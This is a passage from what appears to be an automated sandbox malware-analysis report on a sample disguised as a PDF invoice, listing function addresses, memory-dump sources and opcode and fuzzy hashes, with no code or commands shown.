                                                                                      • Instruction Fuzzy Hash: 3201B174509208EFCB45DFE4D905EADBFB9EF46310F0080DEE80497221DA329E10EB61
                                                                                      Function 0676C7C1 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 75fc55281b89efa08e27499780268759c01babee650f86f6188a402a30eb7885
                                                                                      • Instruction ID: 80fa386526a3d2441e4ba1be66ff5998887e4321ec28a0a6ae4f6a27120024b1
                                                                                      • Opcode Fuzzy Hash: 75fc55281b89efa08e27499780268759c01babee650f86f6188a402a30eb7885
                                                                                      • Instruction Fuzzy Hash: D40171B0C05208EFC766DBA9D9046BDBFF4DF89200F1481EAEC45A7261DA315E42DB61
                                                                                      Function 065C1900 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 194f0598ba72e95814c2110dc569b43dfe15f0cf4e4c5cd1dcc308fc0ea84651
                                                                                      • Instruction ID: 391d8f4a12c08b43ef514c442112f6866180703fe131c9c65b15f85b0030169b
                                                                                      • Opcode Fuzzy Hash: 194f0598ba72e95814c2110dc569b43dfe15f0cf4e4c5cd1dcc308fc0ea84651
                                                                                      • Instruction Fuzzy Hash: 5101D470809248AFCB65DBE4C800AADBFF4EF46210F1481DEE844A72A3DA315B11DBA1
                                                                                      Function 00D1D785 Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208040237.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d1d000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33e458d343a2b25164a1e20d134326320167f977461fafa2df2eb59cc7c56f0e
                                                                                      • Instruction ID: d57a2cb8bca96b820b244f1c67754f126599c872ee537c77922fd2c47fa40906
                                                                                      • Opcode Fuzzy Hash: 33e458d343a2b25164a1e20d134326320167f977461fafa2df2eb59cc7c56f0e
                                                                                      • Instruction Fuzzy Hash: C101FC71008340AAE7104A19DDC4BA6BF99DF41334F1CC41AED4A4A1C2CB389880D671
                                                                                      Function 0676A8B0 Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d01a4a86e1cecda8c3574aa7af8c17cce249d80027139b5ef16128068b63fdea
                                                                                      • Instruction ID: 33fe77b30b30d2e3d427f17e328be13828af756d7b86ae834f81101c344258f5
                                                                                      • Opcode Fuzzy Hash: d01a4a86e1cecda8c3574aa7af8c17cce249d80027139b5ef16128068b63fdea
                                                                                      • Instruction Fuzzy Hash: FD015270E09349DEDB95DF6AC8042BCBBF5BB0A204F1590A9D819F3261E7344A41CF40
                                                                                      Function 06766FE8 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dd3f6416f06c74becd31ac40c1a67191e43edc6d7da9c39cb30ab5d8fb7220ea
                                                                                      • Instruction ID: 295bb7ed90ad97e333ab6ec8ebb7bf1f7c8ab7250957b934e4b107e24d61870a
                                                                                      • Opcode Fuzzy Hash: dd3f6416f06c74becd31ac40c1a67191e43edc6d7da9c39cb30ab5d8fb7220ea
                                                                                      • Instruction Fuzzy Hash: EE01B1307103009FD769AB35D458B7B77A2ABC5368F14862CEA568B794CB76EC02DB90
                                                                                      Function 06764C68 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 538dac19191aa26b63eec059a0f3f8f4b6f9ee73d7fb096a731189e5ea7465a4
                                                                                      • Instruction ID: 65d36f684a89ec845c5fb26f055a88d507542e6bf5c51caebc17258922de3353
                                                                                      • Opcode Fuzzy Hash: 538dac19191aa26b63eec059a0f3f8f4b6f9ee73d7fb096a731189e5ea7465a4
                                                                                      • Instruction Fuzzy Hash: F4018135300200AFC355DF26D854D767BA6EFCA720B1580AAFA468B7B1CA31DC02C790
                                                                                      Function 0676F518 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c3095022bc226e986125860af4b6172e299d5600f107991ea299daa0a58ffcfe
                                                                                      • Instruction ID: e3931d74ebabbcb3d5c9f0b8c91f2e2b653f2af072d44dcebaf43f40f2ee7a9f
                                                                                      • Opcode Fuzzy Hash: c3095022bc226e986125860af4b6172e299d5600f107991ea299daa0a58ffcfe
                                                                                      • Instruction Fuzzy Hash: 5AF0F471905248AFC795DFA4D4018EDBBF4EF45340B1481CAE808DB242EA328F4297A2
                                                                                      Function 0676FB78 Relevance: .0, Instructions: 42COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 76cf1c5b59da006cf3913e077943cba1d2f3145667b385e6a1fc492df1a0c41b
                                                                                      • Instruction ID: 12ab438a87a64ce825513e656f558d2c189684950721c27d6d7682e83f838930
                                                                                      • Opcode Fuzzy Hash: 76cf1c5b59da006cf3913e077943cba1d2f3145667b385e6a1fc492df1a0c41b
                                                                                      • Instruction Fuzzy Hash: DF018174D0A208EFCB91DFB8D9519ADBBF5EF49300F1081DAE808D7352DA359A01DBA1
                                                                                      Function 065C25FF Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d4a4755a1a536395bd2d63234a91e7f02ee48cf340d7f35606c51cc4e82c48f
                                                                                      • Instruction ID: 3c066f956d010e4571b89b6a77dec03094b7281d3a1757176d9095fd88722149
                                                                                      • Opcode Fuzzy Hash: 1d4a4755a1a536395bd2d63234a91e7f02ee48cf340d7f35606c51cc4e82c48f
                                                                                      • Instruction Fuzzy Hash: 57F04F74D09208BFD750DBA5C9449B9BBF8EB99210F0084AAA854D3211D6369E42CB91
                                                                                      Function 065C72C4 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9d774a1f2bc7cac3560c1e22e47db20a984b5b8e379c8ee386343122616310a7
                                                                                      • Instruction ID: a0b715b4a8c683cf91322897d0b0c6c5f8e37d74a1828b2881f46588001eba3f
                                                                                      • Opcode Fuzzy Hash: 9d774a1f2bc7cac3560c1e22e47db20a984b5b8e379c8ee386343122616310a7
                                                                                      • Instruction Fuzzy Hash: 6F11C5B0A10219DFEB90CF98D984BAEB7F1FB4A314F508599E408A7640C7B49D85CF91
                                                                                      Function 0676FB30 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ce5e5ba2121ed4713591c99c5fc8fb37157dd59a2ee685c0d40c17271d36665
                                                                                      • Instruction ID: 33e991064d26243b3dd9d02f16fcf720e95db1ba5775ce78c2aab2b9bce56d18
                                                                                      • Opcode Fuzzy Hash: 3ce5e5ba2121ed4713591c99c5fc8fb37157dd59a2ee685c0d40c17271d36665
                                                                                      • Instruction Fuzzy Hash: 78F09671905208EFCB55DFB5E8119B9BBF5DF46200B1485D6F80CD7211E9354E02DBA1
                                                                                      Function 0676A8C0 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dcd9e14563033b97a1a4f72dd6b1ff9133ad2ecdbd91847a91901c077f3af518
                                                                                      • Instruction ID: 1ff56bf7ce27cb51ef8832d98ca6c607ef6256b3d3d44d893609c450c4684bda
                                                                                      • Opcode Fuzzy Hash: dcd9e14563033b97a1a4f72dd6b1ff9133ad2ecdbd91847a91901c077f3af518
                                                                                      • Instruction Fuzzy Hash: 15014670E05209DFDB94EFAAC9007BDBBF5BB49200F11D0A9A829F3210EB344A41CF40
                                                                                      Function 0676F1DF Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 517d3e9c55e8a1d365fbf8a31cd0c08f5af859971d584b0fc3840bca88205465
                                                                                      • Instruction ID: 85d6a48bbe2b56f0ffe8c2caaa461bc6a3e9bc192177601648285b7c6b6e23d0
                                                                                      • Opcode Fuzzy Hash: 517d3e9c55e8a1d365fbf8a31cd0c08f5af859971d584b0fc3840bca88205465
                                                                                      • Instruction Fuzzy Hash: CE01D179505288AFC741DFB4C900AAD7FF4EF4A210F1481DAE848C7252DA368F02EBA1
                                                                                      Function 066A8D50 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5704357d3cee27a74266c9bb2fd58b225b1b0f640f4330a5537881d7a36b921a
                                                                                      • Instruction ID: f33d4aac193a20e782e4febdf98bb8018dc78abbde5415e285acd7cfc9251b78
                                                                                      • Opcode Fuzzy Hash: 5704357d3cee27a74266c9bb2fd58b225b1b0f640f4330a5537881d7a36b921a
                                                                                      • Instruction Fuzzy Hash: 1BF05430A1A208AFC751EBA4D941AB9BBB4DB85211F2085DBDC48D7351D6315E52CBD1
                                                                                      Function 065C2B38 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e19f7608d8a696a44c78ca57f5d1751a6d12cbd732440ed9a2f527a7b4e7210
                                                                                      • Instruction ID: b7ebe64f40d3f82b4f89ff126eea806780e3e9571b8240ea3123320b45b38c3f
                                                                                      • Opcode Fuzzy Hash: 4e19f7608d8a696a44c78ca57f5d1751a6d12cbd732440ed9a2f527a7b4e7210
                                                                                      • Instruction Fuzzy Hash: 44F0C23084A208EFCB55DFE4D8409F9BBB8EF85214F0080DEEC0897252CA315F15DBA1
                                                                                      Function 06764EF0 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27bb2edbf02125c79a3b99f9ddc754e29eb5a2045815177353343b0024f71c6b
                                                                                      • Instruction ID: 3e49dcb39b4d0fb5854ad6032d060a2581e5adaf09c8ea0cf03a601932e6d899
                                                                                      • Opcode Fuzzy Hash: 27bb2edbf02125c79a3b99f9ddc754e29eb5a2045815177353343b0024f71c6b
                                                                                      • Instruction Fuzzy Hash: 7F0181353006109FC7099B25E554A1EBBA3FFCD711B108529EA0687354CF71EC02CBD0
                                                                                      Function 066AB6B0 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc498614da199be6fe0769528dfac2dce3e602a61995de8350260d90b6aa7901
                                                                                      • Instruction ID: 8b931cf7cbc77f708646ac7bdb76247b1d7e066cd2632b974da3e23f734d107d
                                                                                      • Opcode Fuzzy Hash: dc498614da199be6fe0769528dfac2dce3e602a61995de8350260d90b6aa7901
                                                                                      • Instruction Fuzzy Hash: C8F0B472B0D3905FE35607799861329ABA19BD6200F1854DBD1858F3A2ED969C07C750
                                                                                      Function 066AB658 Relevance: .0, Instructions: 37COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 566452e3082b10d094b390d260feb9f4f4aee25b9f0a1109a6e77d5d36ffb85d
                                                                                      • Instruction ID: 3c98b62f40a75822378ddea7285b9119450a8461e284623e5a13299c91c0c581
                                                                                      • Opcode Fuzzy Hash: 566452e3082b10d094b390d260feb9f4f4aee25b9f0a1109a6e77d5d36ffb85d
                                                                                      • Instruction Fuzzy Hash: 94F0E272F043115FE3548A1A9810B2FF7A9EBCD720F14846AE9099B390DEB2AC41C7C4
                                                                                      Function 00D1D784 Relevance: .0, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208040237.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d1d000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c918fbd6472e636b2141ec4c3a215fe75026ccc4c328cf853e58d269d9328b85
                                                                                      • Instruction ID: d7f5c8886860af98d49962b6f41887fc3df56b65b6279d60fe46ca61040e0ebf
                                                                                      • Opcode Fuzzy Hash: c918fbd6472e636b2141ec4c3a215fe75026ccc4c328cf853e58d269d9328b85
                                                                                      • Instruction Fuzzy Hash: 4AF06271405344AEE7208E1AD9C4B62FF98EB55734F18C55AED094B286C779A884CAB1
                                                                                      Function 06504A71 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3db2db4667105916b45d29964406d7332d241fcfb427e04e39dfb3a9fcc2a866
                                                                                      • Instruction ID: 0a750f794e7397790c7e655969916a39947495a4829a80f9a4f00144709ca73f
                                                                                      • Opcode Fuzzy Hash: 3db2db4667105916b45d29964406d7332d241fcfb427e04e39dfb3a9fcc2a866
                                                                                      • Instruction Fuzzy Hash: 1FF06D74909248FFCB91CFA8C800AAEBFF9AB49310F14C0DAB858D3351C6359E51DBA1
                                                                                      Function 066AD910 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da504f95d05c6bef590ddff32d088a2ba2d606385f4465aa43d6f588b5d4d84c
                                                                                      • Instruction ID: ea424cfd046ede540bb0903484bc3966f40d59c2e27d75f2a63004cff7169dc6
                                                                                      • Opcode Fuzzy Hash: da504f95d05c6bef590ddff32d088a2ba2d606385f4465aa43d6f588b5d4d84c
                                                                                      • Instruction Fuzzy Hash: 2BF0BB31A09354AFDB46CF64D8586DD7FB6DF81214F14C096D045C7282D7704E89C791
                                                                                      Function 065CAFE8 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9edd01ca99ef72b4534a19c90977f6073e83884a11877f3b4fdbcdbb23e8cea6
                                                                                      • Instruction ID: bd66724b5694cc8a4048d93f403bf14b63b6b80b58b530560cdeed3a2a4cfa5e
                                                                                      • Opcode Fuzzy Hash: 9edd01ca99ef72b4534a19c90977f6073e83884a11877f3b4fdbcdbb23e8cea6
                                                                                      • Instruction Fuzzy Hash: 5EF0907090A208BFCB55CFA4C9069AABFB8EB49210F0081DEE80493352D2316E41DBA1
                                                                                      Function 065C2978 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9a48cf8067b35019665bc8f2cfa36cf00a33c0dce156d64643c8274307a56eb4
                                                                                      • Instruction ID: 0a0ec0aa86df46c13c3ca8e1c184879c09ade903583622fc6c3d67c12c1e450f
                                                                                      • Opcode Fuzzy Hash: 9a48cf8067b35019665bc8f2cfa36cf00a33c0dce156d64643c8274307a56eb4
                                                                                      • Instruction Fuzzy Hash: 2BF01D34905248FFCB01CF94D8049AEBFB9EB89310F148099F80497351D6315E52DBA1
                                                                                      Function 06762748 Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 47bd1ea5ea4eb5517cfaa26133b65a5c2af7f8775cf41b9c2b6754b7f21ef8f7
                                                                                      • Instruction ID: d45f2918d7f6dbe20e0481b8d4bf3b3f6149d5e2b3cad8172fa940278de69f94
                                                                                      • Opcode Fuzzy Hash: 47bd1ea5ea4eb5517cfaa26133b65a5c2af7f8775cf41b9c2b6754b7f21ef8f7
                                                                                      • Instruction Fuzzy Hash: 76F0A0313052105FCB99A239A8549BE7B9AEBC6210310806AF51ACB352DE608E438BF1
                                                                                      Function 065C9F48 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d5bd348fcc4d46d0292bd40df458ae9b4df6f0cf8981507bfae2e2303d7ac8d2
                                                                                      • Instruction ID: 55237065a863d62f4e747559eb24cd3808dc6421cc9f374f3d89698af2dd8364
                                                                                      • Opcode Fuzzy Hash: d5bd348fcc4d46d0292bd40df458ae9b4df6f0cf8981507bfae2e2303d7ac8d2
                                                                                      • Instruction Fuzzy Hash: 5BF05E3440A24CFFDB06CFA0EC45DAEBF78EB06310F04829EB80457252C6329E61DBA1
                                                                                      Function 065C7BAA Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c76a4045cf338d1039c08e466a3b72ef089c944af5ac05a9c557f711fb4d4ee8
                                                                                      • Instruction ID: 4e46043ca0d46c6c388a25547239fd6fcaa552606a4860b948863d6bb201010b
                                                                                      • Opcode Fuzzy Hash: c76a4045cf338d1039c08e466a3b72ef089c944af5ac05a9c557f711fb4d4ee8
                                                                                      • Instruction Fuzzy Hash: BCF0673480A208BFCB01CF94C800DAEBFB9EF48220F00819AA80496312D2369A61DBA1
                                                                                      Function 0676C4B0 Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c41be0280086b87f34c99d1b79441ca079f7e1e079c51369fb462f14bddcad27
                                                                                      • Instruction ID: 358376dec4274814c54aafd995c77b435098cb9d207df54bd5f45b24184d7656
                                                                                      • Opcode Fuzzy Hash: c41be0280086b87f34c99d1b79441ca079f7e1e079c51369fb462f14bddcad27
                                                                                      • Instruction Fuzzy Hash: 29F0E230E092089FC7A2DBA9C9046BCBFF0EF89200F1081EAEC48D7311D6765D42CB50
                                                                                      Function 06760D1F Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 39c0f669bf88763a37b35b4d8c1be0816059c38f5a1c6ca7d692d216b7cd9b2b
                                                                                      • Instruction ID: 98e1a9ecccca57031f538988ab180c38f8621acf5657ea401fcccf2a0fd98538
                                                                                      • Opcode Fuzzy Hash: 39c0f669bf88763a37b35b4d8c1be0816059c38f5a1c6ca7d692d216b7cd9b2b
                                                                                      • Instruction Fuzzy Hash: A7F0E9313043455BC7155A29EC8489BBF6ADFC1360710996AF10A87116DA709D4A87E0
                                                                                      Function 0676F22B Relevance: .0, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6dde2d653975f0810405191cecfd8e243160d749b7b2f427c15d638ea76b54ec
                                                                                      • Instruction ID: 4aee76812bb3435027c80066a3be7ae14b9c97fef7e7af629409851d5af6a6f1
